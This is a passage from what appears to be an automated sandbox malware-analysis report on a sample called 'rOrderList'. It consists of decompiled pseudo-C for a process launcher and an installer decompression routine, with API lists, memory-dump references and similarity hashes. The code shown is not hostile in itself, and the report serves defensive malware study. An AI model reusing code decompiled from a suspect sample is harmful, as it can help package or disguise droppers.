                                                                                      				0x426750->cb = 0x44;
                                                                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                                      				if(_t7 != 0) {
                                                                                      					CloseHandle(_v20.hThread);
                                                                                      					return _v20.hProcess;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}





                                                                                      0x00405b2e
                                                                                      0x00405b4e
                                                                                      0x00405b56
                                                                                      0x00405b5b
                                                                                      0x00000000
                                                                                      0x00405b61
                                                                                      0x00405b65

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405B5B
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 00405B38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                      • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
                                                                                      • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                      • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 99%
                                                                                      			E00407090() {
                                                                                      				signed int _t530;
                                                                                      				void _t537;
                                                                                      				signed int _t538;
                                                                                      				signed int _t539;
                                                                                      				unsigned short _t569;
                                                                                      				signed int _t579;
                                                                                      				signed int _t607;
                                                                                      				void* _t627;
                                                                                      				signed int _t628;
                                                                                      				signed int _t635;
                                                                                      				signed int* _t643;
                                                                                      				void* _t644;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					_t530 =  *(_t644 - 0x30);
                                                                                      					if(_t530 >= 4) {
                                                                                      					}
                                                                                      					 *(_t644 - 0x40) = 6;
                                                                                      					 *(_t644 - 0x7c) = 0x19;
                                                                                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                      					while(1) {
                                                                                      						L145:
                                                                                      						 *(_t644 - 0x50) = 1;
                                                                                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                      						while(1) {
                                                                                      							L149:
                                                                                      							if( *(_t644 - 0x48) <= 0) {
                                                                                      								goto L155;
                                                                                      							}
                                                                                      							L150:
                                                                                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                      							 *(_t644 - 0x54) = _t643;
                                                                                      							_t569 =  *_t643;
                                                                                      							_t635 = _t569 & 0x0000ffff;
                                                                                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                      							if( *(_t644 - 0xc) >= _t607) {
                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                      								_t628 = _t627 + 1;
                                                                                      								 *_t643 = _t569 - (_t569 >> 5);
                                                                                      								 *(_t644 - 0x50) = _t628;
                                                                                      							} else {
                                                                                      								 *(_t644 - 0x10) = _t607;
                                                                                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                      							}
                                                                                      							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                      								L148:
                                                                                      								_t487 = _t644 - 0x48;
                                                                                      								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                      								L149:
                                                                                      								if( *(_t644 - 0x48) <= 0) {
                                                                                      									goto L155;
                                                                                      								}
                                                                                      								goto L150;
                                                                                      							} else {
                                                                                      								L154:
                                                                                      								L146:
                                                                                      								if( *(_t644 - 0x6c) == 0) {
                                                                                      									L169:
                                                                                      									 *(_t644 - 0x88) = 0x18;
                                                                                      									L170:
                                                                                      									_t579 = 0x22;
                                                                                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                      									_t539 = 0;
                                                                                      									L172:
                                                                                      									return _t539;
                                                                                      								}
                                                                                      								L147:
                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      								_t484 = _t644 - 0x70;
                                                                                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                      								goto L148;
                                                                                      							}
                                                                                      							L155:
                                                                                      							_t537 =  *(_t644 - 0x7c);
                                                                                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                      							while(1) {
                                                                                      								L140:
                                                                                      								 *(_t644 - 0x88) = _t537;
                                                                                      								while(1) {
                                                                                      									L1:
                                                                                      									_t538 =  *(_t644 - 0x88);
                                                                                      									if(_t538 > 0x1c) {
                                                                                      										break;
                                                                                      									}
                                                                                      									L2:
                                                                                      									switch( *((intOrPtr*)(_t538 * 4 +  &M004074FE))) {
                                                                                      										case 0:
                                                                                      											L3:
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L4:
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                      											_t538 =  *( *(_t644 - 0x70));
                                                                                      											if(_t538 > 0xe1) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											L5:
                                                                                      											_t542 = _t538 & 0x000000ff;
                                                                                      											_push(0x2d);
                                                                                      											asm("cdq");
                                                                                      											_pop(_t581);
                                                                                      											_push(9);
                                                                                      											_pop(_t582);
                                                                                      											_t638 = _t542 / _t581;
                                                                                      											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                      											asm("cdq");
                                                                                      											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                      											 *(_t644 - 0x3c) = _t633;
                                                                                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                      												L10:
                                                                                      												if(_t641 == 0) {
                                                                                      													L12:
                                                                                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													goto L11;
                                                                                      												}
                                                                                      												do {
                                                                                      													L11:
                                                                                      													_t641 = _t641 - 1;
                                                                                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                      												} while (_t641 != 0);
                                                                                      												goto L12;
                                                                                      											}
                                                                                      											L6:
                                                                                      											if( *(_t644 - 4) != 0) {
                                                                                      												GlobalFree( *(_t644 - 4));
                                                                                      											}
                                                                                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      											 *(_t644 - 4) = _t538;
                                                                                      											if(_t538 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                      												goto L10;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											L13:
                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												L157:
                                                                                      												 *(_t644 - 0x88) = 1;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L14:
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                      											_t45 = _t644 - 0x48;
                                                                                      											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                      											__eflags =  *_t45;
                                                                                      											L15:
                                                                                      											if( *(_t644 - 0x48) < 4) {
                                                                                      												goto L13;
                                                                                      											}
                                                                                      											L16:
                                                                                      											_t550 =  *(_t644 - 0x40);
                                                                                      											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                      												L20:
                                                                                      												 *(_t644 - 0x48) = 5;
                                                                                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											L17:
                                                                                      											 *(_t644 - 0x74) = _t550;
                                                                                      											if( *(_t644 - 8) != 0) {
                                                                                      												GlobalFree( *(_t644 - 8));
                                                                                      											}
                                                                                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                      											 *(_t644 - 8) = _t538;
                                                                                      											if(_t538 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      										case 2:
                                                                                      											L24:
                                                                                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                      											 *(_t644 - 0x84) = 6;
                                                                                      											 *(_t644 - 0x4c) = _t557;
                                                                                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                      											goto L132;
                                                                                      										case 3:
                                                                                      											L21:
                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												L158:
                                                                                      												 *(_t644 - 0x88) = 3;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L22:
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											_t67 = _t644 - 0x70;
                                                                                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                      											__eflags =  *_t67;
                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                      											L23:
                                                                                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                      											if( *(_t644 - 0x48) != 0) {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      											goto L24;
                                                                                      										case 4:
                                                                                      											L133:
                                                                                      											_t559 =  *_t642;
                                                                                      											_t626 = _t559 & 0x0000ffff;
                                                                                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                      											if( *(_t644 - 0xc) >= _t596) {
                                                                                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                      												 *(_t644 - 0x40) = 1;
                                                                                      												_t560 = _t559 - (_t559 >> 5);
                                                                                      												__eflags = _t560;
                                                                                      												 *_t642 = _t560;
                                                                                      											} else {
                                                                                      												 *(_t644 - 0x10) = _t596;
                                                                                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                      											}
                                                                                      											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                      												goto L139;
                                                                                      											} else {
                                                                                      												goto L137;
                                                                                      											}
                                                                                      										case 5:
                                                                                      											L137:
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												L168:
                                                                                      												 *(_t644 - 0x88) = 5;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L138:
                                                                                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                      											L139:
                                                                                      											_t537 =  *(_t644 - 0x84);
                                                                                      											L140:
                                                                                      											 *(_t644 - 0x88) = _t537;
                                                                                      											goto L1;
                                                                                      										case 6:
                                                                                      											L25:
                                                                                      											__edx = 0;
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												L36:
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											L26:
                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                      											__cl = 8;
                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                      													_t98 = __ebp - 0x38;
                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      													__eflags =  *_t98;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                      												L35:
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												goto L61;
                                                                                      											} else {
                                                                                      												L32:
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 8);
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												goto L41;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											L66:
                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                      												L68:
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                      												__eflags = __eax;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L69;
                                                                                      											}
                                                                                      											L67:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      											goto L132;
                                                                                      										case 8:
                                                                                      											L70:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      											}
                                                                                      											goto L132;
                                                                                      										case 9:
                                                                                      											L73:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												goto L90;
                                                                                      											}
                                                                                      											L74:
                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											L75:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      											__eflags = _t259;
                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                      											goto L76;
                                                                                      										case 0xa:
                                                                                      											L82:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												L84:
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											L83:
                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                      											goto L89;
                                                                                      										case 0xb:
                                                                                      											L85:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      											L89:
                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      											L90:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      											goto L69;
                                                                                      										case 0xc:
                                                                                      											L99:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L164:
                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L100:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t334 = __ebp - 0x70;
                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t334;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											goto L101;
                                                                                      										case 0xd:
                                                                                      											L37:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L159:
                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L38:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t122 = __ebp - 0x70;
                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t122;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L39:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      												goto L48;
                                                                                      											}
                                                                                      											L40:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												goto L54;
                                                                                      											}
                                                                                      											L41:
                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                      											__eax = __eax + 1;
                                                                                      											__eax = __eax << 8;
                                                                                      											__eax = __eax + __ebx;
                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edx;
                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L39;
                                                                                      											} else {
                                                                                      												L45:
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											L46:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												L160:
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L47:
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t156 = __ebp - 0x70;
                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t156;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											while(1) {
                                                                                      												L48:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L49:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
